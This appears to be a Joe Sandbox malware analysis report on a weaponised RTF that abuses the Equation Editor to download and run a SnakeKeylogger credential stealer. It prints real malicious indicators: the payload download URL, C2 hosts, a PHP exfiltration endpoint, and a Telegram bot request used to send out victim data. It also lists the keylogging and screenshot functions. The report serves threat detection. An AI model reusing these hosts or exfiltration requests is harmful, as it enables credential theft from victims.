                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80

                Networking

                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.39:80 -> 192.168.2.22:49161
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.39:80 -> 192.168.2.22:49161
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Tue, 19 Nov 2024 17:08:04 GMTContent-Type: application/x-msdos-programContent-Length: 837120Connection: keep-aliveLast-Modified: Tue, 19 Nov 2024 04:32:51 GMTETag: "cc600-6273c86a96582"Accept-Ranges: bytes
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2011/20/2024%20/%201:09:14%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49165 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49162 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficHTTP traffic detected: GET /txt/Xkl0PnD8zFPjfh1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.39Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A0F671BC-384D-4C76-B9D0-6C0270962DCC}.tmpJump to behavior
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 19 Nov 2024 17:08:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: EQNEDT32.EXE, 00000002.00000002.360779526.000000000064F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.360779526.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exe
                Source: EQNEDT32.EXE, 00000002.00000003.360572542.000000000067B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.360779526.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exeC:
                Source: EQNEDT32.EXE, 00000002.00000002.360779526.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exej
                Source: EQNEDT32.EXE, 00000002.00000002.360779526.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exettC:
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002483000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002562000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875720695.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: wealthcharliebgk.exe, 00000008.00000002.877493043.0000000005B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: wealthcharliebgk.exe, 00000008.00000002.877493043.0000000005B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: wealthcharliebgk.exe, 00000005.00000002.371713149.0000000002465000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a
                Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49179 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, COVID19.cs; .Net Code: TakeScreenshot
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, COVID19.cs; .Net Code: TakeScreenshot
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, COVID19.cs; .Net Code: VKCodeToUnicode
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, COVID19.cs; .Net Code: VKCodeToUnicode

                System Summary

                Source: initial sample; Static file information: Filename: Xkl0PnD8zFPjfh1.wiz.rtf
                Source: Xkl0PnD8zFPjfh1.wiz.rtf, type: SAMPLE; Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe; Process Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe; Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C49808_2_005C4980
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CB2808_2_005CB280
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C3BB88_2_005C3BB8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CADB88_2_005CADB8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C52B08_2_005C52B0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CD8AF8_2_005CD8AF
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C69A88_2_005C69A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CF0A88_2_005CF0A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CADA88_2_005CADA8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C3BAA8_2_005C3BAA
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C12A08_2_005C12A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CC5A08_2_005CC5A0
